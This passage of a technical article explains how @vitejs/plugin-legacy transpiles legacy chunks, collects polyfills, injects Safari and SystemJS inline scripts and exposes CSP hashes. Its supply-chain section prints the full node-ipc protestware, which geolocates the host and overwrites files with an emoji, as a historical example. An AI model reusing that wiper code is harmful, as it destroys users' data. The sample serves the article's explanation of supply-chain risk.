          fileName = fileName.replace('[name]', '[name]-legacy');
        } else if (nonLeadingHashInFileNameRE.test(fileName)) {
          // custom[hash].[format] -> [name]-legacy[hash].[format]
          // custom-[hash].[format] -> [name]-legacy-[hash].[format]
          // custom.[hash].[format] -> [name]-legacy.[hash].[format]
          // custom.[hash:10].[format] -> custom-legacy.[hash:10].[format]
          fileName = fileName.replace(
            prefixedHashInFileNameRE,
            '-legacy$&'
          );
        } else {
          // entry.js -> entry-legacy.js
          // entry.min.js -> entry-legacy.min.js
          fileName = fileName.replace(/(.+?)\.(.+)/, '$1-legacy.$2');
        }

        return fileName;
      };
    };

    const createLegacyOutput = (
      options: OutputOptions = {}
    ): OutputOptions => {
      return {
        ...options,
        format: 'system',
        entryFileNames: getLegacyOutputFileName(options.entryFileNames),
        chunkFileNames: getLegacyOutputFileName(options.chunkFileNames)
      };
    };

    const { rollupOptions } = config.build;
    const { output } = rollupOptions;
    if (Array.isArray(output)) {
      rollupOptions.output = [
        ...output.map(createLegacyOutput),
        ...(genModern ? output : [])
      ];
    } else {
      rollupOptions.output = [
        createLegacyOutput(output),
        ...(genModern ? [output || {}] : [])
      ];
    }
  }
};

RenderChunk Hook's Focus

The renderChunk hook does not handle ssr mode.

ts
const legacyPostPlugin: Plugin = {
  name: 'vite:legacy-post-process',
  enforce: 'post',
  apply: 'build',
  async renderChunk(raw, chunk, opts, { chunks }) {
    if (config.build.ssr) {
      return null;
    }
  }
};

It then initializes the storage object for collected polyfills.

ts
// On first run, initialize the map with sorted chunk file names
let chunkFileNameToPolyfills = outputToChunkFileNameToPolyfills.get(opts);
if (chunkFileNameToPolyfills == null) {
  chunkFileNameToPolyfills = new Map();
  for (const fileName in chunks) {
    chunkFileNameToPolyfills.set(fileName, {
      modern: new Set(),
      legacy: new Set()
    });
  }
  outputToChunkFileNameToPolyfills.set(opts, chunkFileNameToPolyfills);
}
const polyfillsDiscovered = chunkFileNameToPolyfills.get(chunk.fileName);
if (polyfillsDiscovered == null) {
  throw new Error(
    `Internal @vitejs/plugin-legacy error: discovered polyfills for ${chunk.fileName} should exist`
  );
}

Next, renderChunk mainly handles two cases: legacy chunks and modern chunks. The basis for telling them apart is the output configuration created in the configResolved hook.

ts
function isLegacyChunk(
  chunk: RenderedChunk,
  options: NormalizedOutputOptions
) {
  return options.format === 'system' && chunk.fileName.includes('-legacy');
}

As shown, a chunk counts as a legacy chunk when its output format is system and its file name contains -legacy.

Handling Of Legacy Modules

If the configuration does not require generating legacy output, this step is skipped.

ts
const genLegacy = options.renderLegacyChunks !== false;

if (!genLegacy) {
  return null;
}

At the same time, flags are set to restrict other Vite-internal plugins:

ts
// @ts-expect-error avoid esbuild transform on legacy chunks since it produces
// legacy-unsafe code - e.g. rewriting object properties into shorthands
opts.__vite_skip_esbuild__ = true;

// @ts-expect-error force terser for legacy chunks. This only takes effect if
// minification isn't disabled, because that leaves out the terser plugin
// entirely.
opts.__vite_force_terser__ = true;

// @ts-expect-error In the `generateBundle` hook,
// we'll delete the assets from the legacy bundle to avoid emitting duplicate assets.
// But that's still a waste of computing resource.
// So we add this flag to avoid emitting the asset in the first place whenever possible.
opts.__vite_skip_asset_emit__ = true;

// avoid emitting assets for legacy bundle
const needPolyfills =
  options.polyfills !== false && !Array.isArray(options.polyfills);

Note that introducing this plugin renders legacy chunks alongside the original bundle. The following flags apply only to the legacy output; for the normal output they are all undefined.

  1. __vite_skip_esbuild__: When set to true, the vite:esbuild-transpile plugin is skipped (that plugin minifies chunks and transpiles TypeScript to js). esbuild must be kept away from legacy chunks because it produces legacy-unsafe code, for example rewriting object properties into shorthands: even if babel expands { name: name } out, a later esbuild pass would collapse it back into { name }, which is ES2015 syntax and breaks in ES5 environments.
  2. __vite_force_terser__: Forces the use of terser to minify legacy chunks. This only takes effect when minification isn't disabled, because disabling minification leaves out the terser plugin entirely.
  3. __vite_skip_asset_emit__: In the generateBundle hook, Vite deletes assets from the legacy bundle to avoid emitting duplicates. Emitting them at all is still a waste of computing resources, so this flag avoids emitting the assets in the first place whenever possible.

The plugin then uses @babel/preset-env to transpile the legacy chunk's code.

ts
// transform the legacy chunk with @babel/preset-env
const sourceMaps = !!config.build.sourcemap;
const babel = await loadBabel();
const result = babel.transform(raw, {
  babelrc: false,
  configFile: false,
  compact: !!config.build.minify,
  sourceMaps,
  inputSourceMap: undefined,
  presets: [
    // forcing our plugin to run before preset-env by wrapping it in a
    // preset so we can catch the injected import statements...
    [
      () => ({
        plugins: [
          recordAndRemovePolyfillBabelPlugin(polyfillsDiscovered.legacy),
          replaceLegacyEnvBabelPlugin(),
          wrapIIFEBabelPlugin()
        ]
      })
    ],
    [
      (await import('@babel/preset-env')).default,
      createBabelPresetEnvOptions(targets, { needPolyfills })
    ]
  ]
});

if (result) return { code: result.code!, map: result.map };
return null;

The legacyPostPlugin's renderChunk hook augments @babel/preset-env with three custom babel plugins: recordAndRemovePolyfillBabelPlugin, replaceLegacyEnvBabelPlugin, and wrapIIFEBabelPlugin.

Attention

babel first runs the @babel/preset-env preset, which parses the chunk code, analyzes the JavaScript features it uses against the targets option, and injects polyfill imports as needed.

After @babel/preset-env has run, the babel plugins above execute in turn. Let's analyze the implementation of each.

  1. The replaceLegacyEnvBabelPlugin babel plugin

    This plugin mainly handles the value of legacyEnvVarMarker in legacy chunk.

    ts
    function replaceLegacyEnvBabelPlugin(): BabelPlugin {
      return ({ types: t }): BabelPlugin => ({
        name: 'vite-replace-env-legacy',
        visitor: {
          Identifier(path) {
            if (path.node.name === legacyEnvVarMarker) {
              path.replaceWith(t.booleanLiteral(true));
            }
          }
        }
      });
    }

    The vite:define plugin replaces import.meta.env.LEGACY with legacyEnvVarMarker (__VITE_IS_LEGACY__) in the transform phase. This plugin then replaces legacyEnvVarMarker with a concrete boolean in the renderChunk phase: true for legacy chunks, false for modern chunks.

    The replacement mechanism differs between the two kinds of chunks: in legacy chunks it is done by the babel plugin shown above, while in modern chunks the marker is replaced directly with a regular expression:
    ts
    if (!isLegacyChunk(chunk, opts)) {
      if (raw.includes(legacyEnvVarMarker)) {
        const re = new RegExp(legacyEnvVarMarker, 'g');
        let match;
        while ((match = re.exec(raw))) {
          ms.overwrite(
            match.index,
            match.index + legacyEnvVarMarker.length,
            `false`
          );
        }
      }
    }
  2. The recordAndRemovePolyfillBabelPlugin babel plugin

    This babel plugin collects the module specifiers of the import statements left in the transpiled legacy chunk.

    ts
    function recordAndRemovePolyfillBabelPlugin(
      polyfills: Set<string>
    ): BabelPlugin {
      return ({ types: t }: { types: typeof BabelTypes }): BabelPlugin => ({
        name: 'vite-remove-polyfill-import',
        post({ path }) {
          path.get('body').forEach(p => {
            if (t.isImportDeclaration(p.node)) {
              polyfills.add(p.node.source.value);
              p.remove();
            }
          });
        }
      });
    }

    By Vite's renderChunk phase, imports and exports have already been resolved and bundled, so under normal circumstances a chunk contains no import or export statements. If an import turns up here, it must be a polyfill dependency injected by @babel/preset-env during transpilation.

    This babel plugin's job, then, is to collect the polyfill dependencies injected by @babel/preset-env. The @vitejs/plugin-legacy plugin does not re-bundle the chunk graph after renderChunk, which would add complexity; instead, it collects the import specifiers in each legacy chunk, records them as polyfill dependencies, and removes the import statements from the legacy chunk via p.remove().

    In the generateBundle stage, the collected polyfill dependencies are built into a standalone bundle.

  3. The wrapIIFEBabelPlugin babel plugin

    ts
    function wrapIIFEBabelPlugin(): BabelPlugin {
      return ({ types: t, template }): BabelPlugin => {
        const buildIIFE = template(';(function(){%%body%%})();');
    
        return {
          name: 'vite-wrap-iife',
          post({ path }) {
            if (!this.isWrapped) {
              this.isWrapped = true;
              path.replaceWith(
                t.program(buildIIFE({ body: path.node.body }))
              );
            }
          }
        };
      };
    }

    Finally, an immediately invoked function expression wraps the legacy chunk's source code. The reasoning can be found in the related PR; it is mainly about avoiding global scope pollution.

Handling Of Modern Modules

The source code is as follows:

js
// Detects whether the browser supports import.meta, dynamic import,
// and async generators, i.e. whether it is a "modern" browser
const detectModernBrowserDetector =
  'import.meta.url;import("_").catch(()=>1);async function* g(){};';
const modernChunkLegacyGuard = `export function __vite_legacy_guard(){${detectModernBrowserDetector}};`;
async function renderChunk(raw, chunk, opts) {
  if (!isLegacyChunk(chunk, opts)) {
    // options.modernPolyfills === true is not recommended, because core-js@3 is very aggressive about which features it polyfills: even for targets with native ESM support it injects ~15kb
    if (
      options.modernPolyfills &&
      !Array.isArray(options.modernPolyfills)
    ) {
      await detectPolyfills(raw, { esmodules: true }, modernPolyfills);
    }
    const ms = new MagicString(raw);
    // Inject detection of modern browsers at the entry point
    if (genLegacy && chunk.isEntry) {
      ms.prepend(modernChunkLegacyGuard);
    }
    // Replace the injected legacyEnvVarMarker with false; this enables subsequent tree-shaking of legacy-only branches
    if (raw.includes(legacyEnvVarMarker)) {
      const re = new RegExp(legacyEnvVarMarker, 'g');
      let match;
      while ((match = re.exec(raw))) {
        ms.overwrite(
          match.index,
          match.index + legacyEnvVarMarker.length,
          'false'
        );
      }
    }
    if (config.build.sourcemap) {
      return {
        code: ms.toString(),
        map: ms.generateMap({ hires: true })
      };
    }
    return {
      code: ms.toString()
    };
  }
}

The above source can be broken down into the following parts:

  1. Handling of options.modernPolyfills: as on the legacy path, @babel/preset-env is used to detect (without modifying the source code) and collect the needed polyfills.

    js
    if (options.modernPolyfills && !Array.isArray(options.modernPolyfills)) {
      await detectPolyfills(raw, { esmodules: true }, modernPolyfills);
    }
  2. Add detection at the entry point of the module to determine whether it is a modern browser.

    js
    const detectModernBrowserDetector =
      'import.meta.url;import("_").catch(()=>1);async function* g(){};';
    
    const modernChunkLegacyGuard = `export function __vite_legacy_guard(){${detectModernBrowserDetector}};`;
    
    const ms = new MagicString(raw);
    if (genLegacy && chunk.isEntry) {
      ms.prepend(modernChunkLegacyGuard);
    }
  3. Pin the value of legacyEnvVarMarker to false.

    js
    if (raw.includes(legacyEnvVarMarker)) {
      const re = new RegExp(legacyEnvVarMarker, 'g');
      let match;
      while ((match = re.exec(raw))) {
        ms.overwrite(
          match.index,
          match.index + legacyEnvVarMarker.length,
          'false'
        );
      }
    }

generateBundle Hook's Focus

The collected polyfill set is assembled into a new virtual module as follows:

js
function polyfillsPlugin(imports, externalSystemJS) {
  return {
    name: 'vite:legacy-polyfills',
    resolveId(id) {
      if (id === polyfillId) {
        return id;
      }
    },
    load(id) {
      if (id === polyfillId) {
        return (
          // imports are all the polyfills needed for compatibility in the renderChunk phase.
          [...imports].map(i => `import "${i}";`).join('') +
          (externalSystemJS ? '' : 'import "systemjs/dist/s.min.js";')
        );
      }
    }
  };
}

In the generateBundle stage, Vite's build API is invoked separately to build the polyfill bundle. In the end, modern browsers get output that relies on native esm, while older browsers get the nomodule output.

js
async function buildPolyfillChunk(
  name,
  imports,
  bundle,
  facadeToChunkMap,
  buildOptions,
  externalSystemJS
) {
  let { minify, assetsDir } = buildOptions;
  minify = minify ? 'terser' : false;
  const res = await build({
    // so that everything is resolved from here
    root: __dirname,
    configFile: false,
    logLevel: 'error',
    plugins: [polyfillsPlugin(imports, externalSystemJS)],
    build: {
      write: false,
      target: false,
      minify,
      assetsDir,
      rollupOptions: {
        input: {
          [name]: polyfillId
        },
        output: {
          format: name.includes('legacy') ? 'iife' : 'es',
          manualChunks: undefined
        }
      }
    }
  });
  // ...
}

Note

  1. plugin-legacy internally uses terser to minify the legacy code. Therefore, when minify is enabled, make sure the terser dependency is installed.

  2. useBuiltIns: 'usage' means only the polyfills that are actually used get included; compare it with useBuiltIns: 'entry'.

  3. From the build options and the vite-wrap-iife plugin (executed first among the wrapper preset's plugins), we can see the following:

js
const options = {
  output: {
    format: name.includes('legacy') ? 'iife' : 'es',
    manualChunks: undefined
  }
};

function wrapIIFEBabelPlugin() {
  return ({ types: t, template }) => {
    const buildIIFE = template(';(function(){%%body%%})();');

    return {
      name: 'vite-wrap-iife',
      post({ path }) {
        if (!this.isWrapped) {
          this.isWrapped = true;
          path.replaceWith(t.program(buildIIFE({ body: path.node.body })));
        }
      }
    };
  };
}

So the legacy polyfill chunk is an immediately invoked function expression.

The polyfill chunk is then injected into the bundle as the polyfill bundle.

js
async function buildPolyfillChunk(
  name,
  imports,
  bundle,
  facadeToChunkMap,
  buildOptions,
  externalSystemJS
) {
  // ...
  const _polyfillChunk = Array.isArray(res) ? res[0] : res;
  if (!('output' in _polyfillChunk)) return;
  const polyfillChunk = _polyfillChunk.output[0];

  // associate the polyfill chunk to every entry chunk so that we can retrieve
  // the polyfill filename in index html transform
  for (const key in bundle) {
    const chunk = bundle[key];
    if (chunk.type === 'chunk' && chunk.facadeModuleId) {
      facadeToChunkMap.set(chunk.facadeModuleId, polyfillChunk.fileName);
    }
  }

  // add the chunk to the bundle
  bundle[polyfillChunk.name] = polyfillChunk;
}

Implementation Considerations

Detect Omission Of Promise Polyfill

A default Vite project is esm-based, and in legacy browsers esm features are emulated by systemjs. The systemjs loader itself depends on Promise.

When the user does not use promise in the module:

js
import react from 'react';
console.log(react);

@babel/preset-env does not inject a Promise polyfill when parsing this code. Yet the module does use import syntax, an esm-specific feature whose downgrade relies on systemjs, and systemjs depends on Promise.

Therefore, @vitejs/plugin-legacy handles this case explicitly.

ts
async function detectPolyfills(
  code: string,
  targets: any,
  list: Set<string>
): Promise<void> {
  const babel = await loadBabel();
  const result = babel.transform(code, {
    ast: true,
    babelrc: false,
    configFile: false,
    compact: false,
    presets: [
      [
        (await import('@babel/preset-env')).default,
        createBabelPresetEnvOptions(targets, {})
      ]
    ]
  });
  for (const node of result!.ast!.program.body) {
    if (node.type === 'ImportDeclaration') {
      const source = node.source.value;
      if (
        source.startsWith('core-js/') ||
        source.startsWith('regenerator-runtime/')
      ) {
        list.add(source);
      }
    }
  }
}
const legacyGenerateBundlePlugin: Plugin = {
  name: 'vite:legacy-generate-polyfill-chunk',
  apply: 'build',

  async generateBundle(opts, bundle) {
    // legacy bundle
    if (options.polyfills !== false) {
      // check if the target needs Promise polyfill because SystemJS relies on it
      // https://github.com/systemjs/systemjs#ie11-support
      await detectPolyfills(
        `Promise.resolve(); Promise.all();`,
        targets,
        legacyPolyfills
      );
    }
  }
};

By running Promise.resolve(); Promise.all(); through the detection routine, the Promise polyfill is added automatically whenever the targets require it. This guarantees the built polyfill bundle includes a Promise polyfill, so that systemjs can run.
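
Since detectPolyfills is part of the plugin's public exports, the same detection can be sketched standalone (the printed set is indicative and depends on the targets):

js
import { detectPolyfills } from '@vitejs/plugin-legacy';

// collect the polyfills the given code would need for the given targets
const needed = new Set();
await detectPolyfills('Promise.resolve(); Promise.all();', 'chrome 49', needed);
console.log(needed); // e.g. Set { 'core-js/modules/es.promise.js', ... }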

Inject Inline JS Code

Inline JavaScript is injected into index.html for three things: the Safari 10.1 nomodule fix, the initialization of systemjs, and the dynamic import fallback.

Safari 10.1 nomodule Fix

safari 10.1 supports type=module but does not support the nomodule attribute (nomodule support only arrived in safari 11). In safari 10.1, a script tag with nomodule is treated like an ordinary script tag, so the browser executes both the type="module" script and the nomodule script, running the code twice. safari 10.1 therefore needs a dedicated fix.

The Safari 10.1 nomodule support gist offers a reference solution:

js
(function () {
  // Create a test script element
  var check = document.createElement('script');

  // Check two key features:
  // 1. 'noModule' attribute exists
  // 2. 'onbeforeload' event is supported
  if (!('noModule' in check) && 'onbeforeload' in check) {
    var support = false;

    // Add beforeload event listener
    document.addEventListener(
      'beforeload',
      function (e) {
        if (e.target === check) {
          // Mark that the browser supports modules
          support = true;
        } else if (!e.target.hasAttribute('nomodule') || !support) {
          return;
        }
        // Prevent loading of scripts with nomodule
        e.preventDefault();
      },
      true
    );

    // Set test script
    check.type = 'module';
    check.src = '.';
    document.head.appendChild(check);
    check.remove();
  }
})();

onbeforeload is a rather special event whose support differs markedly from ordinary events such as onclick or onload: it is essentially specific to safari, which is why its presence can be used to identify safari-specific behavior. Let's look at the situation in different browsers.

In safari:

ts
const script = document.createElement('script');
// true
console.log('onbeforeload' in script);

In other browsers (such as chrome, firefox, ie):

ts
const script = document.createElement('script');
// false
console.log('onbeforeload' in script);

We can determine whether a browser is safari by checking for the onbeforeload event on a script element.

We can determine whether it predates nomodule support by checking whether the script element lacks the noModule property. Together, the two checks single out safari 10.1 and earlier:

ts
if (!('noModule' in check) && 'onbeforeload' in check) {
  // This condition only holds in safari versions without nomodule support (notably safari 10.1).
}

Dynamic Import Fallback

safari 10.1 throws an error when dynamic import is used inside a script with type=module. Dynamic import therefore needs a fallback.

The fallback is implemented through systemjs:

html
<script type="module">
  !(function () {
    if (window.__vite_is_modern_browser) return;
    console.warn(
      'vite: loading legacy chunks, syntax error above and the same error below should be ignored'
    );
    var e = document.getElementById('vite-legacy-polyfill'),
      n = document.createElement('script');
    (n.src = e.src),
      (n.onload = function () {
        System.import(
          document
            .getElementById('vite-legacy-entry')
            .getAttribute('data-src')
        );
      }),
      document.body.appendChild(n);
  })();
</script>

<script
  nomodule
  crossorigin
  id="vite-legacy-entry"
  data-src="/assets/index-legacy-CwS5KdAx.js"
>
  System.import(
    document.getElementById('vite-legacy-entry').getAttribute('data-src')
  );
</script>

Content Security Policy

Because of safari 10.1's quirks, the @vitejs/plugin-legacy plugin must inject inline javascript runtime code into index.html. This runtime code comprises the safari 10.1 nomodule fix, the systemjs initialization, and the dynamic import fallback.

If the project enforces a strict csp policy, the hash of every inline script must be added to the script-src list. @vitejs/plugin-legacy already computes the hashes of all its inline scripts internally.

ts
import crypto from 'node:crypto';

const hash =
  // crypto.hash is supported in Node 21.7.0+, 20.12.0+
  crypto.hash ??
  ((
    algorithm: string,
    data: crypto.BinaryLike,
    outputEncoding: crypto.BinaryToTextEncoding
  ) => crypto.createHash(algorithm).update(data).digest(outputEncoding));
export const cspHashes = [
  safari10NoModuleFix,
  systemJSInlineCode,
  detectModernBrowserCode,
  dynamicFallbackInlineCode
].map(i => hash('sha256', i, 'base64'));

We can read these values directly from the exported cspHashes variable (note that the sha256- prefix is not included and must be added manually).

ts
import { cspHashes } from '@vitejs/plugin-legacy';

This import exposes all the csp hash values for the inline scripts injected into the html.
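A minimal sketch of adding the prefix by hand (the variable name scriptSrcHashes is ours, not part of the plugin's API):

ts
import { cspHashes } from '@vitejs/plugin-legacy';

// cspHashes holds bare base64 digests; a csp source expression needs
// the sha256- prefix and surrounding single quotes added manually
const scriptSrcHashes = cspHashes.map(h => `'sha256-${h}'`).join(' ');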

Tip

For a detailed introduction and caveats about csp hashes, please refer to Using a hash with CSP.

The script tag's integrity attribute is similar to csp; the comparison below is worth noting.

html
<script
  src="https://example.com/example-framework.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous"
></script>

integrity is a security feature that lets browsers check whether a fetched resource (for example, one served from a cdn) has been tampered with: the browser hashes the downloaded file and compares the result with the hash supplied in the integrity attribute. It complements csp:

  1. csp is a preventive security measure:

    • Defines a global policy for resource loading.
    • Actively restricts which inline scripts may execute.
    • Protects the entire page.
    • Prevents xss attacks.
  2. integrity is a verification security measure:

    • Does not restrict resource loading itself.
    • Verifies content after the resource loads and before it executes.
    • Protects individual resources.
    • Prevents supply chain attacks.

In modern web security practice, combining the two significantly improves an application's resistance to xss and supply chain attacks.
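To make the verification concrete, here is a minimal sketch of computing an sri value with node's crypto module (example-framework.js stands in for the hypothetical file from the snippet above; the browser performs the matching comparison after download):

ts
import crypto from 'node:crypto';
import { readFileSync } from 'node:fs';

// Compute a sha384 SRI value for a local copy of the file. The browser
// recomputes this digest after fetching the resource and refuses to
// execute it if the digests differ.
const body = readFileSync('example-framework.js');
const sri =
  'sha384-' + crypto.createHash('sha384').update(body).digest('base64');
console.log(sri);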

Going a step further, pnpm-lock.yaml also records an integrity value for every external dependency and uses it for the same kind of verification.

yaml
packages:
  '@algolia/autocomplete-core@1.17.7':
    resolution:
      {
        integrity: sha512-BjiPOW6ks90UKl7TwMv7oNQMnzU+t/wk9mgIDi6b1tXpUek7MW0lbNOUHpvam9pe3lVCf4xPFT+lK7s+e+fs7Q==
      }

The working principle matches that of the browser's integrity attribute on script tags: the recorded hash verifies the integrity of downloaded remote dependencies, ensuring they were not tampered with in transit and reducing the risk of supply chain attacks via cdn servers (dns hijacking, domain expiration, account takeover at the domain registrar, or repointing the cdn domain's traffic to an attacker-controlled server). Both follow the W3C Subresource Integrity specification.
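A hypothetical sketch of the equivalent check for a downloaded tarball (file name and flow simplified; pnpm's actual implementation differs):

ts
import crypto from 'node:crypto';
import { readFileSync } from 'node:fs';

// The lockfile records "sha512-<base64>"; recompute the digest of the
// downloaded tarball and refuse to install it on mismatch.
const expected =
  'sha512-BjiPOW6ks90UKl7TwMv7oNQMnzU+t/wk9mgIDi6b1tXpUek7MW0lbNOUHpvam9pe3lVCf4xPFT+lK7s+e+fs7Q==';
const tarball = readFileSync('autocomplete-core-1.17.7.tgz');
const actual =
  'sha512-' + crypto.createHash('sha512').update(tarball).digest('base64');
if (actual !== expected) {
  throw new Error('integrity check failed: dependency may have been tampered with');
}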

The integrity verification mechanism primarily defends against supply chain attacks in the transmission and distribution stages, i.e., tampering with legitimate code on its way from the original publisher to the end user. Cryptographic hash verification ensures the code the developer published is the code the user receives.

It cannot, however, defend against malicious code that is already present at the source, i.e., intentional poisoning by a package maintainer or takeover of a maintainer's account, which is in fact the most common problem:

  • 2022-03-15: vue-cli was hit by a supply chain attack when its dependency node-ipc shipped deliberately malicious behavior.

    The malicious logic was as follows:

    js
    import u from 'path';
    import a from 'fs';
    import o from 'https';
    setTimeout(
      function () {
        const t = Math.round(Math.random() * 4);
        if (t > 1) {
          return;
        }
        const n =
          'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154';
        o.get(n.toString('utf8'), function (t) {
          t.on('data', function (t) {
            const n = './';
            const o = '../';
            const r = '../../';
            const f = '/';
            const c = 'country_name';
            const e = 'russia';
            const i = 'belarus';
            try {
              const s = JSON.parse(t.toString('utf8'));
              const u = s[c.toString('utf8')].toLowerCase();
              const a =
                u.includes(e.toString('utf8')) ||
                u.includes(i.toString('utf8'));
              if (a) {
                h(n.toString('utf8'));
                h(o.toString('utf8'));
                h(r.toString('utf8'));
                h(f.toString('utf8'));
              }
            } catch (t) {}
          });
        });
      },
      Math.ceil(Math.random() * 1e3)
    );
    async function h(n = '', o = '') {
      if (!a.existsSync(n)) {
        return;
      }
      let r = [];
      try {
        r = a.readdirSync(n);
      } catch (t) {}
      const f = [];
      const c = '❤️';
      for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
          t = a.lstatSync(i);
        } catch (t) {
          continue;
        }
        if (t.isDirectory()) {
          const s = h(i, o);
          s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
          try {
            a.writeFile(i, c.toString('utf8'), function () {});
          } catch (t) {}
        }
      }
      return f;
    }
    const ssl = true;
    export { ssl as default, ssl };

    This was a targeted supply chain attack against developers in specific regions (Russia and Belarus). The author betrayed the open source spirit by using an open source project as a tool for political ends, a form of open source terrorism. A traditional supply chain is constrained by contracts between its tiers; the open source supply chain has no such constraint. The seemingly strong open source community is in fact fragile: when the trust chain breaks, the ecosystem built on top of it collapses.

    A small aside:

    The attacker, node-ipc author Brandon Nozaki Miller (RIAEvangelist), even offered a "helpful tip":

    Locking deps after a code review is probably good practice anyway.

  • 2021-10-22: ua-parser-js was poisoned, likely because the maintainer's account was compromised.

    • Account takeover: the attacker gained control of Faisal Salman's npm account in an undisclosed manner.

    • Malicious version release: immediately after taking over the account, the attacker published three new versions containing malicious code:

      • 0.7.29 (targeting users on the old line)
      • 0.8.0 (a new minor version, inviting upgrades)
      • 1.0.0 (a major version bump, enticing early adopters)
    • Quick discovery: GitHub user "AminCoder" raised the first alert on GitHub after spotting the suspicious code.

    • Confirmation and response: within hours, the npm security team confirmed the attack and acted quickly.

    • Official announcement: the same day, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an official warning.

    • Cleanup: npm removed the malicious versions from the registry, and the project maintainer released clean fixed versions.

    • Security advisory: GitHub published the CVE-2021-42078 advisory, officially recording the incident.

In response, organizational and preventive measures were developed:

  • Stronger package integrity verification: wider reliance on SRI and lockfile integrity checks to verify package integrity.
  • 2FA requirement: npm now requires maintainers of popular packages to use 2FA, and keeps expanding its scope.
  • Supply-chain-level frameworks: SLSA (Supply chain Levels for Software Artifacts) and SBOM (Software Bill of Materials) are widely adopted.
  • Promotion of the "lockfile freeze" practice: blocking automatic upgrades to the latest version to limit exposure to supply chain attacks.
  • Public funding support: platforms such as Open Collective and GitHub Sponsors address the financial sustainability of open source maintenance.
  • Advanced monitoring tools: automated security tooling that detects anomalous package behavior, especially network activity and file system operations.

Users can manually copy the values of cspHashes into the script-src directive of the Content-Security-Policy meta tag. Note, however, that these values may change between minor versions; if you copy them manually, pin the plugin's minor version with ~.

A more suitable scheme is to inject the csp hashes automatically with a user-land vite plugin, for example:

ts
import { defineConfig } from 'vite';
import legacy, { cspHashes } from '@vitejs/plugin-legacy';

export default defineConfig({
  plugins: [
    {
      name: 'vite-plugin-inject-csp-hashes',
      apply: 'build',
      enforce: 'post',

      transformIndexHtml(html) {
        return {
          html,
          tags: [
            {
              tag: 'meta',
              attrs: {
                'http-equiv': 'Content-Security-Policy',
                content:
                  `script-src 'self' ` +
                  cspHashes.map(hash => `'sha256-${hash}'`).join(' ')
              },
              injectTo: 'head-prepend'
            }
          ]
        };
      }
    },
    legacy({
      targets: ['defaults', 'not IE 11']
    })
  ]
});

The emitted html looks like this:

html
<meta
  http-equiv="Content-Security-Policy"
  content="script-src 'self' 
  'sha256-MS6/3FCg4WjP9gwgaBGwLpRCY6fZBgwmhVCdrPrNf3E=' 'sha256-tQjf8gvb2ROOMapIxFvFAYBeUJ0v1HCbOcSmDNXGtDo=' 'sha256-VA8O2hAdooB288EpSTrGLl7z3QikbWU9wwoebO/QaYk=' 
  'sha256-+5XkZFazzJo8n0iOP4ti/cLCMUudTf//Mzkb7xNPXIc='"
/>

An html page may contain multiple csp meta tags, each defining its own policy directives; all of them are enforced together, so a resource must satisfy every policy.

The regenerator-runtime polyfill tries to register itself on the globalThis object. When globalThis is unavailable (globalThis is relatively new and is not supported by ie 11, among others), it falls back to a dynamic Function(...) call, which violates csp rules. To avoid that dynamic evaluation in environments lacking globalThis, manually add core-js/proposals/global-this to additionalLegacyPolyfills.
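A sketch of the corresponding configuration (targets match the example earlier in this article):

ts
import { defineConfig } from 'vite';
import legacy from '@vitejs/plugin-legacy';

export default defineConfig({
  plugins: [
    legacy({
      targets: ['defaults', 'not IE 11'],
      // ship a globalThis polyfill so regenerator-runtime does not fall
      // back to a dynamic Function(...) call that a strict csp would block
      additionalLegacyPolyfills: ['core-js/proposals/global-this']
    })
  ]
});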
